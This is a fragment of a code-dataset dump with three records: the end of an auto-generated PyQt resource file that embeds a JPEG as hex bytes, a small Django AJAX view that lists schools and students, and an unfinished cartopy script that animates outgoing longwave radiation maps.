\x2b\\x9c\\x4a\\xc9\\x0b\\xc0\\x03\\x9f\\x11\\x8d\\x0c\\x8b\\x05\\\n\\xca\\xb5\\x86\\x41\\x60\\x11\\x64\\x0c\\x0c\\x51\\x23\\x85\\x45\\x13\\x22\\xc4\\\n\\xae\\x19\\x2a\\x83\\x6f\\x40\\xf9\\xc1\\x5d\\x24\\xd0\\x32\\x66\\x6f\\xce\\x04\\\n\\x79\\x2b\\x0c\\xc8\\x6c\\x95\\x8b\\xc6\\x86\\x4e\\xc1\\x37\\xd2\\x15\\xa9\\xfa\\\n\\x54\\x82\\xd9\\x95\\x75\\xb6\\x43\\xc6\\xc5\\xd6\\xd2\\x90\\xee\\x83\\x96\\x6e\\\n\\x60\\x6b\\x0d\\x51\\xba\\x46\\x53\\x76\\x89\\x49\\x9a\\x75\\xe9\\x8d\\xe3\\xd3\\\n\\x2a\\x52\\xd4\\x6c\\xb7\\x09\\x2a\\xd3\\xb9\\x8b\\x30\\x56\\x89\\x70\\xb5\\xa1\\\n\\x39\\x6c\\xb2\\xbb\\x02\\x7b\\x1e\\x40\\x88\\x4a\\x34\\x43\\x71\\x33\\x36\\xa9\\\n\\x94\\x86\\xe6\\x52\\xca\\xdf\\x63\\xdd\\xa4\\x1d\\x01\\x48\\xb9\\xb2\\x0f\\xcc\\\n\\xf2\\xe7\\xda\\x32\\x36\\x55\\xa8\\xd7\\xbc\\x95\\x34\\xea\\x50\\xdb\\x6d\\xa1\\\n\\x6a\\x37\\x0b\\xd6\\xfa\\xdb\\x4b\\x9d\\x3a\\x76\\x82\\x64\\x28\\xe9\\xa9\\xcc\\\n\\xa5\\xac\\xa8\\xca\\xd2\\x56\\x73\\x29\\x20\\x0b\\x2e\\xdd\\xae\\x38\\x75\\xd6\\\n\\x09\\x15\\x59\\x99\\x2e\\xe5\\x4a\\x79\\xac\\x92\\xca\\x73\\x72\\x40\\xcc\\x85\\\n\\x0b\\x24\\x1b\\xf2\\x06\\xdc\\xbe\\x51\\xd1\\x0e\\x0b\\x9c\\x72\\x47\\x8e\\xc8\\\n\\x79\\x4e\\x37\\x14\\xfa\\x73\\xec\\xac\\x2d\\xe9\\xd7\\xaf\\xf8\\x5a\\x59\\x1f\\\n\\xc6\\x3d\\x18\\x76\\x7a\\x72\\x8f\\x1a\\x35\\xb7\\xed\\x3d\\x23\\x0e\\x4b\\x3a\\\n\\xf3\\xa8\\x42\\x1d\\x72\\xc4\\xeb\\x75\\x93\\xfd\\x63\\x1b\\x43\\xda\\xd6\\x9d\\\n\\x76\\x38\\x71\\x22\\x3b\\x28\\xf4\\x64\\x48\\x3b\\x20\\xd2\\x16\\x85\\x29\\x6a\\\n\\x24\\x0f\\xfc\\xde\\x3c\\x25\\x88\\xd8\\x8e\\x3e\\x95\\xb0\\x1d\\x05\\xa5\\x8e\\\n\\xd6\\x19\\x69\\x7b\\x95\\xba\\x90\\xa2\\x2e\\x0f\\xf2\\x84\\x96\\x77\\x3b\\x08\\\n\\xa7\\xdb\\x1a\\xd7\\x53\\x51\\xc7\\x55\\x31\\xab\\xb2\\xca\\x5a\\x1a\\x4f\\x17\\\n\\x2b\\xf5\\x8f\\x5a\\x17\\x47\\xb5\\xd9\\x47\\xce\\x5a\\x3a\\x6a\\x23\\x5d\\x4b\\\n\\x4f\\x3c\\xac\\x62\\x39\\xc9\\xe5\\xad\\x4f\\x4c\\xd9\\x0a\\x37\\xca\\x23\\xd5\\\n\\x87\\x02\\x1c\\x33\\xcb\\x74\\x58\\xb1\\xd7\\x08\\xe1\\xaa\\x53\\x05\\x73\\x2b\\\n\\x0d\\x39\\xbc\\x68\\x73\\x24\\x5a\\xff\\x00\\x4b\\xde\\x39\\x63\\x3f\\x08\\xf5\\\n\\x20\\x43\\xa5\\xb8\\x58\\xcd\\x13\\xa4\\x38\\x8b\\x29\\x4a\\xd3\\x44\\xa0\\x0e\\\n\\x7a\\xff\\x00\\x08\\xf3\\xde\\xe3\\xd5\\x62\\x48\\xc4\\x6d\\x28\\xdf\\x28\\xad\\\n\\xa0\\xee\\x86\\xd7\\x24\\x58\\xf7\\xf3\\x68\\xc3\\x39\\xd0\\xaa\\xb4\\xea\\x29\\\n\\x04\\x8b\\x00\\x3b\\xea\\x34\\x3f\\x58\\xce\\x65\\x91\\xd7\\xb7\\x5f\\x37\\x80\\\n\\x43\\x00\\x72\\x9c\\xb9\\x4d\\x88\\xd4\\x73\\x80\\x08\\x5b\\xaa\\x5b\\xd7\\x59\\\n\\xb9\\xe5\\xac\\x0a\\xa0\\x8c\\x93\\x6f\\x0c\\x13\\x7d\\x38\\x8f\\x51\\x6e\\xb1\\\n\\x22\\x1d\\x57\\xb7\\xc2\\xab\\x8f\\x11\\x42\\x44\\x2d\\x4b\\x7c\\xc2\\x73\\x5f\\\n\\x90\\x07\\x4d\\x0f\\x21\\x09\\x54\\xb4\\x4a\\x8b\\x80\\x56\\x45\\xd9\\x29\\x2a\\\n\\x4e\\x85\\x5d\\xad\\xd2\\xfe\\x62\\x55\\x41\\x13\\x04\\xce\\x6d\\xa6\\x8a\\xd0\\\n\\x9c\\xf6\\x0e\\x8c\\xc0\\x0d\\x4e\\x61\\xa5\\x8e\\x97\\x82\\x63\\x96\\x10\\x85\\\n\\x25\\x4d\\x66\\x4e\\x5b\\x24\\xe6\\x57\\x4e\\x7d\\xa0\\x62\\x95\\x11\\x98\\x35\\\n\\x19\\x4d\\x34\\xd2\\x1d\\x2e\\x2d\\xb4\\xb8\\x2c\\x01\\x42\\x0e\\x63\\xa8\\x1a\\\n\\xdf\\xb9\\x31\\x13\\x36\\xa0\\xb5\\xa9\\x7c\\xe8\\x2e\\x29\\xa4\\xbc\\x5a\\xba\\\n\\x2d\\xbc\\xb0\\x40\\x3c\\x88\\xb6\\xa7\\x9c\\x35\\x5c\\x22\\x18\\xcc\\x12\\xd6\\\n\\x93\\x2a\\x14\\xf2\\xe7\\x1c\\x53\\xca\\xdd\\xd9\\xa2\\x14\\x2c\\x35\\xd6\\xe4\\\n\\xe8\\x7e\\x90\\x4f\\x04\\x28\\xa6\\x27\\x71\\x64\\xba\\x4f\\xbb\\x69\\x28\\x4e\\\n\\xed\\x21\\x57\\x74\\x81\\x73\\x7e\\xa4\\x91\\x6b\\x8e\\x42\\xd1\\x13\\x35\\xa0\\\n\\xca\\x96\\x65\\xa6\\xe6\\x8e\\x77\\x54\\x5b\\x48\\x3a\\x84\\x12\\x34\\xf2\\x34\\\n\\xd6\\x12\\x2d\\x43\\x54\\xa4\\xbd\\xb9\\x57\\x54\\xeb\\x3b\\x94\\x67\\x39\\x2d\\\n\\x76\\x92\\x54\\x4f\\x53\\xa7\\xf3\\x10\\x2a\\xd4\\xe1\\x22\\x52\\xd6\\x8a\\xe4\\\n\\xb0\\x71\\xa7\\x10\\xca\\xb8\\x8a\\xd3\\x62\\x54\\x9c\\xb6\\x03\\xa5\\xfa\\xdf\\\n\\xcc\\x39\\x85\\x0d\\xa9\\xce\\x31\\x67\\x90\\x66\\xe6\\x11\\x91\\x86\\x1b\\x68\\\n\\xf1\\x6e\\xd9\\x56\\x54\\x5c\\x0d\\x4d\\x89\\x36\\xb9\\xec\\x62\\x91\\x6a\\x21\\\n\\xec\\xa5\\xad\\x34\\xce\\x34\\x33\\xad\\x4a\\x75\\x2b\\x2a\\x41\\x51\\x57\\xd3\\\n\\x91\\xb0\\xe7\\xd2\\x09\\x93\\x26\\xb4\\xd7\\xbc\\xd9\\x6d\\x90\\x87\\x73\\x03\\\n\\x6c\\xc1\\x36\\x3c\\xfa\\x13\\xf4\\x87\\x33\\x2b\\x9d\\x26\\x2b\\xa0\\xa5\\xc2\\\n\\x83\\xe0\\x02\\x2f\\xcf\\xc1\\x8d\\x2b\\x14\\x8a\\x1c\\x2a\\x2a\\xb9\\xb5\\xcc\\\n\\x35\\x78\\xd1\\x08\\xba\\x8a\\xc2\\x3a\\x8d\\x2d\\xfd\\x6f\\x13\\x5b\\x87\\x21\\\n\\x2e\\xa4\\xab\\xe2\\xfd\\x35\\x82\\x65\\x12\\x14\\xe0\\x55\\x8a\\x62\\xa6\\x4c\\\n\\x9a\\x64\\x34\\xbd\\x4a\\xf9\\x0e\\xd6\\xbd\\xfc\\x6b\\x1a\\xa1\\x9b\\x90\\xcc\\\n\\x6d\\xeb\\x23\\xd3\\xf3\\xb4\\x6a\\x8a\\x73\\x39\\x86\\x62\\x66\\x9d\\x57\\xc5\\\n\\x62\\x47\\x2d\\x23\\x49\\x9c\\xcb\\x0d\\xb9\\x8c\\xf9\\x79\\xf5\\xa4\\xf2\\x48\\\n\\x22\\xd7\\xd0\\x46\\x93\\x39\\xdf\\x0a\\x46\\xee\\x4e\\xb7\\x30\\xc8\\x07\\x86\\\n\\xc3\\x5f\\x84\\x5e\\xd1\\x2a\\xda\\x86\\xc8\\x94\\xe5\\x1d\\xa5\\x2b\\x68\\x4f\\\n\\x4a\\x24\\x34\\xa7\\xf3\\xa4\\x1e\\x4e\\x0b\\xa6\\xdf\\x23\\x19\\x2d\\x91\\xae\\\n\\x3b\\x19\\x6d\\xa4\\xe9\\x9c\\xda\\x04\\xac\\xec\\x99\\x29\\xca\\xc3\\xe8\\xeb\\\n\\x9c\\x14\\x11\\xd6\\xe0\\xc4\\x25\\x8a\\x97\\x1b\\xad\\xbd\\xb1\\x1b\\xd6\\x68\\\n\\x9c\\xc6\\x4c\\x39\\x3a\\xe5\\x3d\\xe7\\x50\\xdb\\xf9\\xf2\\x84\\x2d\\x20\\x10\\\n\\xaf\\x9f\\x22\\x0f\\x48\\xea\\x48\\x34\\x9c\\xeb\\x1a\\xa3\\x53\\x51\\x62\\x52\\\n\\xa6\\xab\\x3a\\xc3\\x6b\\x5f\\x45\\x01\\x62\\x3e\\xa2\\x3a\\x2e\\x6d\\x3c\\xf7\\\n\\x3e\\x67\\x2f\\x3b\\x86\\xdf\\x75\\x1b\\xc9\\x27\\xae\\x07\\x26\\xdd\\xf1\\xe4\\\n\\x46\\x4f\\xb3\\xfd\\xa3\\x64\\x54\\x6e\\x59\\xcf\\x4d\\x48\\x54\\x24\\xd5\\xfe\\\n\\xfa\\xc2\\x98\\x47\\xe2\\x17\\x29\\x36\\xf2\\x34\\x8e\\x37\\xb1\\xcd\\xca\\x3b\\\n\\x9a\\xb0\\xdd\\x92\\x57\\x2c\\x73\\xce\\x21\\x2b\\xca\\x1a\\x4e\\xa4\\x92\\x40\\\n\\x20\\x5c\\xea\\x46\\xbf\\xa4\\x63\\x59\\xba\\x43\\x36\\x8c\\xd6\\x5e\\x66\\x9a\\\n\\xe5\\x32\\x53\\x72\\x59\\x24\\x0d\\xfe\\xec\\x66\\x03\\x35\\xf9\\xd8\\x12\\x62\\\n\\x3b\\x4e\\x36\\x4f\\xb5\\xa2\\x4b\\x66\\x53\\xdb\\xa9\\x9c\\xa1\\xb5\\x58\\xba\\\n\\xa7\\x16\\xab\\xb9\\xaf\\x22\\xa1\\x73\\xad\\xad\\x71\\x04\\xc1\\x18\\x25\\x8b\\\n\\x4c\\x6f\\x15\\xc0\\xd5\\x95\\x91\\x06\\xc4\\x5c\\x13\\x63\\xce\\xe6\\xd0\\x65\\\n\\x02\\xa5\\x26\\xbe\\xa9\\x59\\x7e\\xad\\x36\\xdb\\xce\\x30\\xc4\\xb9\\x43\\x69\\\n\\x6e\\xd2\\xed\\x84\\x05\\xda\\xfc\\x44\\x0d\\x2e\\x62\\xd3\\x04\\x87\\xe1\\x61\\\n\\x18\\x3b\\xce\\x87\\x35\\x80\\xfd\\x62\\xe6\\x67\\x21\\x0b\\x89\\x2d\\x7c\\x0a\\\n\\x51\\xef\\xf5\\xf1\\x15\\x32\\x91\\xb8\\x45\\x16\\x2a\\x50\\x08\\xb9\\x2a\\xd0\\\n\\x27\\xad\\xe3\\x33\\x52\\xb2\\x54\\x95\\x7c\\x3a\\x88\\x73\\x2e\\x41\\xbd\\xef\\\n\\x04\\xc5\\x40\\x58\\xb8\\x40\\x1d\\x62\\xb2\\x87\\x92\\x64\\xcd\\xd2\\xaa\\x52\\\n\\x72\\x0d\\xcf\\x4c\\x4b\\xa9\\xb9\\x77\\x15\\x95\\x2b\\x36\\xd4\\x91\\x71\\x61\\\n\\xce\\xde\\x62\\x5d\\x82\\x53\\x1e\\xd7\\x9a\\xfd\\x0c\\x41\\x42\\x11\\x01\\x48\\\n\\x52\\xa4\\xc4\\x1a\\x22\\x98\\xeb\\x6b\\x5d\\x23\\x39\\x1b\\x23\\x8a\\x08\\xe2\\\n\\xb1\\x10\\x8d\\x84\\xf8\\x55\\x12\\x32\\x14\\xa2\\x4e\\xb1\\x0a\\xa3\\x44\\x22\\\n\\x24\\x61\\x00\\x04\\x00\\x10\\x00\\x40\\x01\\x00\\x04\\x00\\x10\\x00\\x40\\x01\\\n\\x14\\x01\\x00\\x04\\x00\\x10\\x00\\x40\\x01\\x00\\x04\\x00\\x10\\x00\\x40\\x01\\\n\\x12\\x01\\x00\\x00\\xe6\\x60\\x01\\x22\\x06\\x10\\x01\\x30\\x00\\x40\\x01\\x00\\\n\\x04\\x00\\x10\\x00\\x40\\x01\\x00\\x04\\x00\\x10\\x00\\x40\\x01\\x00\\x04\\x00\\\n\\x44\\x00\\x4c\\x00\\x10\\x00\\x45\\x20\\x94\\x68\\x00\\x21\\x80\\xc2\\x34\\x42\\\n\\x47\\x48\\x07\\x9c\\x32\\x4b\\x7c\\x0d\\x04\\x51\\x99\\x60\\x02\\x19\\x2a\\x32\\\n\\x00\\x8d\\x08\\x52\\xd8\\x09\\x08\\x00\\x04\\x34\\x12\\x92\\x54\\x40\\xd2\\x1a\\\n\\x88\\xac\\x98\\xcc\\xb1\\x9b\\xd5\\x42\\xf1\\x48\\x27\\x1b\\x36\\xb8\\x15\\xa7\\\n\\x21\\xd0\\xc6\\xe8\\x71\\xbe\\xf9\\x90\\x95\\x10\\x72\\x9d\\x47\\x98\\xa3\\x15\\\n\\x2f\\x96\\x7d\\x6d\\x38\\x95\\x00\\x95\\x73\\xd1\\x42\\xe2\\x2d\\x0c\\xde\\xd4\\\n\\x2e\\x54\\xc3\\xd3\\x13\\x60\\xbc\\xbc\\xd6\\xd0\\x00\\x2d\\x68\\x14\\x48\\xd4\\\n\\xa4\\xba\\x59\\x45\\xd5\\x09\\x75\\x80\\x50\\xae\\x63\\xa7\\x4e\\x9f\\x53\\x19\\\n\\xa8\\xd0\\xce\\xa6\\x34\\xe4\\xfc\\xc3\\x74\\xa7\\x1e\\x21\\x83\\x67\\x6f\\x6b\\\n\\xaa\\xf6\\xb5\\xaf\\xda\\xd0\\x85\\x52\\xd2\\x74\\xcd\\xd1\\xa4\\x64\\xd3\\xc2\\\n\\xd9\\x75\\x5a\\x90\\xa7\\x78\\xad\\xf2\\x1c\\xbf\\x84\\x7a\\xb0\\xa0\\xb3\\x51\\\n\\xe3\\xda\\x2d\\x11\\x35\\x93\\x72\\xa4\\xa7\\xa0\\xbd\\xac\\x3a\\x47\\x6a\\x1e\\\n\\x52\\x97\\xb4\\x04\\x59\\x82\\x9e\\x95\\x83\\x24\\xee\\xf8\\x25\\xd3\\x71\\x6e\\\n\\x91\\xe3\\x5b\\x32\\x4f\\xac\\xe8\\xc6\\xa1\\xbe\\xae\\xd7\\x66\\xa5\\xd8\\x9a\\\n\\x6d\\xa4\\xa4\\x04\\x58\\x0b\\xf3\\xd7\\xac\\x79\\xd6\\x68\\x2c\\x73\\x9b\\x34\\\n\\x3d\\x1b\\x5d\\xa2\\x23\\x61\\xba\\x4a\\x79\\x8d\\x4e\\xaf\\x34\\xf5\\x49\\xd7\\\n\\x14\\xa2\\x0a\\x14\\x2c\\x02\\x8d\\xb4\\xb5\\xa3\\xe8\\xa0\\xb1\\xb4\\x1f\\x15\\\n\\x6a\\x88\\xf7\\xc5\\x9a\\xa9\\xab\\xaa\\x4c\\xb8\\xe4\\xc1\\x5a\\xac\\x49\\xd6\\\n\\x3a\\x21\\xb5\\x29\\x33\\x6a\\x54\\xf5\\x55\\x39\\x99\\xf9\\xa5\\x06\\x95\\x64\\\n\\xf3\\xee\\x6f\\x1c\\xf1\\x1e\\xb4\\x9e\\x9c\\x08\\x69\\x51\\xcf\\x4c\\x9e\\x63\\\n\\xa0\\xbc\\x79\\x11\\x1c\\xa7\\xb1\\x0c\\xc3\\x99\\x6d\\x2d\\xba\\xa4\\xea\\x72\\\n\\xda\\xc6\\x39\\xd4\\xe9\\x62\\xaa\\x98\\xa0\\xdd\\x57\\xb0\\x1a\\xf2\\x11\\x99\\\n\\xb1\\x2a\\x6d\\x21\\x4e\\x79\\x46\\x68\\x14\\xa4\\x55\\xc1\\x29\\xec\\x3a\\x11\\\n\\x12\\x50\\x0b\\x2a\\xd7\\x00\\x7c\\xa0\\x02\\xe4\\xa1\\x22\\x59\\x4e\\x8b\\x85\\\n\\x66\\x03\\x43\\xe2\\x01\\x28\\xc8\\x03\\x41\\xd3\\x30\\x1f\\xa8\\x84\\x2c\\xe4\\\n\\x82\\x40\\x09\\xbd\\xc1\\x0a\\xe6\\x39\\x5a\\x24\\xb3\\x29\\x92\\xa7\\x8b\\x6a\\\n\\x5a\\xd5\\x7d\\x34\\xbd\\xff\\x00\\x9c\\x25\\x34\\x61\\x90\\x78\\x5e\\x9a\\xb1\\\n\\x36\\x04\\x69\\x7d\\x0c\\x0a\\x5b\\x1a\\x95\\x38\\xc8\\x65\\x39\\xa6\\x03\\x69\\\n\\x51\\x48\\x4a\\x88\\x4d\\xf5\\xcb\\x71\\xd2\\x25\\x46\\x99\\x43\\x9b\\x07\\x26\\\n\\x02\\x92\\x95\\x00\\x83\\x61\\x6b\\x5b\\x48\\x13\\x28\\xa7\\xb5\\x29\\x71\\x72\\\n\\xd2\\x01\\x68\\xa7\\x4b\\x8c\\x96\\x1c\\xad\\xa4\\x41\\xa9\\x62\\x5d\\x0d\\x97\\\n\\xdc\\x46\\x74\\xf1\\xa9\\x36\\x0b\\xe6\\x35\\x8a\\xa9\\x48\\xa5\\x3c\\xcb\\x65\\\n\\x82\\x56\\x5b\\x53\\x89\\x0e\\x14\\xa3\\x4c\\xdf\\x3b\\x41\\xa2\\x2d\\x23\\x75\\\n\\x42\\x61\\x13\\x13\\x6d\\xcb\\x82\\xa4\\x25\\xc5\\x04\\xf3\\xbe\\x5b\\x9b\\x69\\\n\\xdb\\x48\\xcd\\x5c\\xad\\xc4\\x6c\\x8d\\x47\\x63\\x1a\\xa7\\x22\\xdd\\x3a\\xb1\\\n\\x31\\x26\\x83\\x9d\\x0d\\x83\\x62\\x6e\\x3d\\x44\\x77\\x8a\\x42\\x5f\\x82\\xdb\\\n\\xc5\\x92\\x0c\\xa4\\xcf\\xca\\xd9\\x4b\\x4e\\xf1\\x2d\\x83\\x65\\x74\\x55\\xee\\\n\\x20\\xd2\\x29\\x1a\\x94\\x88\\xa9\\xc7\\x24\\x26\\xcb\\xb2\\xc8\\x69\\x2b\\x71\\\n\\xd5\\x37\\x75\\x20\\x2b\\x2e\\x96\\xb8\\x07\\x40\\x7c\\xc0\\x0a\\xd4\\xc2\\xda\\\n\\x60\\xcd\\x49\\xa1\\xa4\\x21\\x49\\xcb\\x72\\xdd\\xf5\\x4f\\x5e\\x77\\xe7\\xce\\\n\\x06\\x64\\x92\\xf6\\xa5\\x4d\\x34\\x93\\x01\\x09\\x51\\x48\\x40\\xca\\x5c\\x17\\\n\\x49\\x26\\xc6\\xfd\\x20\\x43\\x37\\xe4\\x98\\x6e\\x5d\\xe5\\x05\\x38\\x73\\x1b\\\n\\x94\\x8b\\xf4\\x00\\xd8\\x5a\\x28\\x4a\\x6b\\x9e\\x1c\\x08\\xb9\\x24\\xda\\xf7\\\n\\x3c\\xe3\\x43\\x9d\\x30\\x9b\\x7c\\xc7\\x59\\xb3\\x8a\\x55\\x81\\xc8\\x40\\x02\\\n\\x29\\x08\\x51\\x2c\\x09\\x4a\\x0f\\x2d\\x4f\\xce\\x18\\x90\\x8b\\x01\\xc9\\x23\\\n\\xf0\\xc4\\x8e\\x6a\\x58\\x8b\\xba\\x56\\xa7\\x09\\x51\\x42\\x2c\\x2f\\xac\\x6a\\\n\\xdc\\x2c\\x62\\x7e\\x0e\\x2d\\x64\\xb1\\x95\\x5c\\xd3\\xe9\\xbe\\x86\\x34\\x61\\\n\\x2f\\x2d\\x3e\\xec\\x9c\\xba\\x58\\x5e\\x2c\\xcd\\x30\\xb1\\x96\\x85\\x9c\\xa9\\\n\\xe5\\xca\\xf1\\x66\\x6a\\x88\\x65\\x32\\xe2\\x9c\\x56\\x55\\x1b\\xda\\x35\\x43\\\n\\x07\\xb5\\x1b\\x88\\xc8\\x0e\\x2b\\x36\\x5b\\xf4\\xbc\\x59\\x8d\\x28\\x09\\x98\\\n\\x50\\x1a\\x0e\\xf0\\xd1\\xca\\x0a\\xc4\\x2e\\x13\\x2f\\x27\\x92\\xbf\\x58\\xd6\\\n\\xa5\\x32\\x58\\x6d\\x51\\x67\\x27\\x32\\xaa\\x9f\\x50\\x71\\x94\\xbc\\xb6\\x5c\\\n\\x4b\\x65\\x2b\\x26\\xce\\x27\\x52\\x01\\xb6\\xba\\x5a\\xc2\\xc7\\xfa\\x40\\xe5\\\n\\xa6\\x97\\x26\\x33\\xaa\\x03\\x6a\\x47\\xb1\\x71\\x1d\\x95\\x16\\x79\\x75\\x19\\\n\\x46\\xdd\\x75\\x36\\x59\\x49\\x24\\xdf\\xb4\\x74\\x4e\\x67\\x98\\xe6\\xd3\\x16\\\n\\x8c\\xc6\\xe7\\x76\\x05\\xc0\\x26\\xd0\\x86\\x5a\\x86\\xd2\\x50\\x41\\xd4\\x1d\\\n\\x08\\x3d\\x62\\x14\\x68\\x6b\\xe7\\x30\\xcd\\x26\\x79\\x05\\xc0\\xd2\\xa5\\x5c\\\n\\x17\\xe2\\x97\\x39\\x2f\\xdf\\x4e\\x51\\xcb\\x12\\x0b\\x2a\\xc4\\x75\\xc3\\x8c\\\n\\xfc\\x99\\xde\\x38\\x9a\\xe4\\xba\\xa8\\xee\\x7b\\x03\\x6e\\x6f\\x12\\x81\\x70\\\n\\x42\\x72\\xff\\x00\\x8f\\x61\\x1e\\x5a\\x9e\\xaa\\x18\\x93\\x0b\\x32\\x6d\\x8b\\\n\\x59\\x44\\xa3\\x9d\\xad\\xd0\\x6b\\xfc\\x4c\\x05\\x1a\\xe7\\x26\\x5c\\x71\\xf0\\\n\\xa7\\x42\\x14\\x4a\\x07\\xa6\\xc0\\x0f\\x11\\x48\\x62\\xaa\\xb2\\x31\\x8b\\x85\\\n\\x05\\x20\\x25\\x26\\xe3\\xa8\\x8b\\x1a\\x24\\xc9\\x52\\x94\\xa4\\x95\\x12\\x6e\\\n\\x05\\x86\\xbd\\x2d\\xca\\x1a\\x81\\x5a\\x74\\x00\\x8e\\x66\\x02\\x94\\x62\\x46\\\n\\x73\\x64\\x84\\x81\\xda\\x11\\x23\\x0b\\x87\\x43\\x89\\x51\\x4a\\xbb\\x8f\\x94\\\n\\x56\\x90\\x76\\x73\\x18\\x8b\\xd5\\x44\\x9e\\x64\\xc6\\x6a\\x6e\\x99\\x20\\x92\\\n\\x5b\\x58\\x52\\x7f\\x8c\\x0d\\x72\\xb5\\xd7\\x81\\x70\\x92\\x4a\\x6f\\x66\\xeb\\\n\\x73\\xb3\\x34\\x16\\xa4\\x5f\\x56\\x66\\x1b\\xe2\\x48\\xea\\x23\\x57\\x2e\\x96\\\n\\x73\\x95\\x8d\\x93\\xa9\\xcc\\x73\\xa6\\xfd\\xe3\\x23\\xb5\\x0a\\xc1\\x27\\x9c\\\n\\x05\\x0a\\x62\\x46\\x56\\x40\\x84\\x68\\x85\\x0a\\x1d\\x3b\\xc6\\x6a\\x68\\x86\\\n\\x2a\\xf4\\x56\\x91\\x9a\\x9d\\x08\\x21\\x89\\x52\\x89\\x88\\x00\\x86\\x01\\x00\\\n\\x04\\x00\\x10\\x00\\x40\\x01\\x00\\x04\\x00\\x10\\x00\\x40\\x01\\x00\\x04\\x00\\\n\\x10\\x00\\x40\\x01\\x00\\x04\\x00\\x10\\x00\\x40\\x01\\x00\\x04\\x00\\x03\\x99\\\n\\x80\\x0f\\xff\\xd9\\\n\"\n\nqt_resource_name = b\"\\\n\\x00\\x06\\\n\\x06\\xe9\\xc7\\x63\\\n\\x00\\x67\\\n\\x00\\x72\\x00\\x75\\x00\\x70\\x00\\x6f\\x00\\x73\\\n\\x00\\x0a\\\n\\x07\\x6b\\x82\\xe7\\\n\\x00\\x67\\\n\\x00\\x72\\x00\\x75\\x00\\x70\\x00\\x6f\\x00\\x73\\x00\\x2e\\x00\\x6a\\x00\\x70\\x00\\x67\\\n\"\n\nqt_resource_struct_v1 = b\"\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\\n\\x00\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\\n\"\n\nqt_resource_struct_v2 = b\"\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x01\\x71\\x1a\\x32\\x67\\x63\\\n\"\n\nqt_version = QtCore.qVersion().split('.')\nif qt_version < ['5', '8', '0']:\n rcc_version = 1\n qt_resource_struct = qt_resource_struct_v1\nelse:\n rcc_version = 2\n qt_resource_struct = qt_resource_struct_v2\n\ndef qInitResources():\n QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)\n\nqInitResources()\n","repo_name":"migherize/Champions","sub_path":"grupos_rc.py","file_name":"grupos_rc.py","file_ext":"py","file_size_in_byte":607754,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15954856189","text":"from django.core.paginator import Paginator\nfrom django.http import JsonResponse\nfrom django.template.loader import render_to_string\nfrom .models import School, Zone, Student\n\n\ndef get_school_by_zone(request):\n selected_zone_id = request.GET.get('selected_zone_id', None)\n selected_zone = Zone.objects.get(id=selected_zone_id)\n schools = School.objects.filter(zone=selected_zone)\n t = render_to_string('auths/school_by_zone.html', {'data': schools})\n return JsonResponse({'data': t})\n\n\ndef get_student_by_school(request):\n selected_school_id = request.GET.get('selected_school_id', None)\n selected_school = School.objects.get(id=selected_school_id)\n all_students = Student.objects.filter(current_school=selected_school)\n paginator = Paginator(all_students, 4)\n page = request.GET.get('page')\n students = paginator.get_page(page)\n t = render_to_string('auths/students_by_school.html', {'data': students})\n return JsonResponse({'data': t})","repo_name":"MayowaFunmi/school-management-system-v2","sub_path":"auths/ajax_view.py","file_name":"ajax_view.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70446881389","text":"import cartopy.crs as ccrs\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as ani\nimport glob\nimport xarray as xr\nimport sys,os,subprocess\nimport numpy as np\nfrom cartopy import config\nfrom matplotlib import cm\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\n\nbasedir = '/work/bb1018/b380873/tropic_run2_output/'\nolr_file = basedir + 'OLR_TOA_all.nc'\nolr_data = xr.open_dataset(olr_file)\nolr_vals = np.abs(olr_data.lwflxall.values)\nlons = olr_data.lon\nlats = olr_data.lat\nzeit = olr_data.time\nprint(zeit[0])\nprint(zeit[-1])\nsys.exit()\n# pulling this from the following stackoverflow\n# https://stackoverflow.com/questions/30030328/correct-placement-of-colorbar-relative-to-geo-axes-cartopy\ndef resize_colobar(event):\n plt.draw()\n\n posn = ax.get_position()\n cbar_ax.set_position([posn.x0 + posn.width + 0.01, posn.y0,\n 0.04, posn.height])\n\n\nfig, ax = plt.subplots(1,1,figsize=(11,3.7),\n subplot_kw={'projection': ccrs.PlateCarree()})\ncbar_ax = fig.add_axes([0, 0, 0.1, 0.1])\nfig.subplots_adjust(hspace=0, wspace=0, top=0.925, left=0.1)\n\n#levs = np.logspace(-1,2.5,15)\n#levs = np.linspace(0,800,15)\nlevs = np.linspace(100,390,15)\ndef animate(i):\n print(i)\n ax.clear()\n print(olr_vals[i,0].shape)\n print(np.nanmin(olr_vals[i,0]),np.nanmean(olr_vals[i,0]),np.nanmax(olr_vals[i,0]))\n im = ax.contourf(lons,lats,olr_vals[i,0],levels=levs,cmap=cm.viridis,\\\n transform=ccrs.PlateCarree()) \n\n fig.canvas.mpl_connect('resize_event', resize_colobar)\n plt.colorbar(im,label=r'W m$^{-2}$',cax=cbar_ax)\n\n ax.set_title('TOA OLR: '+ str(zeit[i].values))\n gl = ax.gridlines(crs=ccrs.PlateCarree(),draw_labels=True,\n linewidth=1,color='gray',alpha=0.5,linestyle='--')\n gl.xlabels_top = False\n gl.ylabels_right = False\n gl.xformatter = LONGITUDE_FORMATTER\n gl.yformatter = LATITUDE_FORMATTER\n\n ax.set_extent([55,170,-5,38],crs=ccrs.PlateCarree())\n im.set_clim([100,400])\n ax.coastlines()\n 